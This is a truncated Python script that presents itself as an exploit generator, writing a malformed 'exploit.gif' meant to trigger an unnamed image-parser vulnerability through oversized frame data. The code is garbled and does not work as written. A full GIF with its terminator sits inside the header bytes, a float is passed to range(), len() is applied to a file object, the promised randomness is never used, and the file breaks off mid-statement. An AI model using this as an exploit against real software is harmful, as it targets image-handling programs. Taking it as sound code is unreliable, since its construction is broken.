#!/usr/bin/env python3

import struct
from typing import BinaryIO

# Generates a random GIF file into `out` using the
# given RNG as source of randomness. This is mainly here to show
# that the vulnerability can be triggered by a crafted
# framedata field in an image descriptor structure (which may not
# contain all 256 bytes).


def make_random_frame(rng: int) -> bytearray:
    return bytearray([
        rng & 0xff,
        1 << rng % 8 | rng >> 4,
    ])


def write_int(f: BinaryIO, i: int):
    f.write(struct.pack('<H', i))


# "Screen size" according to specs
WIDTH = 3072 // 8 * 8
HEIGHT = 2048 // 8 * 8


def main():
    with open('exploit.gif', 'wb') as out:

        # Header
        out.write(b'GIF89a\x00\x00\x00\x00\x00\x00!\xf9\x04\x01\n\x00,\x00\x00\x00\x00\x01\x00\
               \x01\x00\x00\x02\x02D\x01\x00;')

        # Logical screen descriptor
        write_int(out, WIDTH)
        write_int(out, HEIGHT)
        out.write(bytes((
            0x80,    # Global color table flag
            7,       # Color resolution
            0,        # Sorting method (none)
            0,  # Size of global color table
            0,        # Background index
            0,        # Pixel aspect ratio
            )))

        # Image descriptor
        write_int(out, 0)   # Left position
        write_int(out, 0)   # Top position
        write_int(out, WIDTH)   # Width
        write_int(out, HEIGHT)  # Height
        out.write(bytes((
            0,  # Local color table flag
            0,
                )))         # LZW minimum code size

        # Frame data
        FRAMECOUNT = 0xffffe / ((WIDTH + 1) * HEIGHT + 1) - 2
        for _ in range(FRAMECOUNT):
            out.write(make_random_frame(len(out)))

    print("Done! Check exploit.gif :)")


if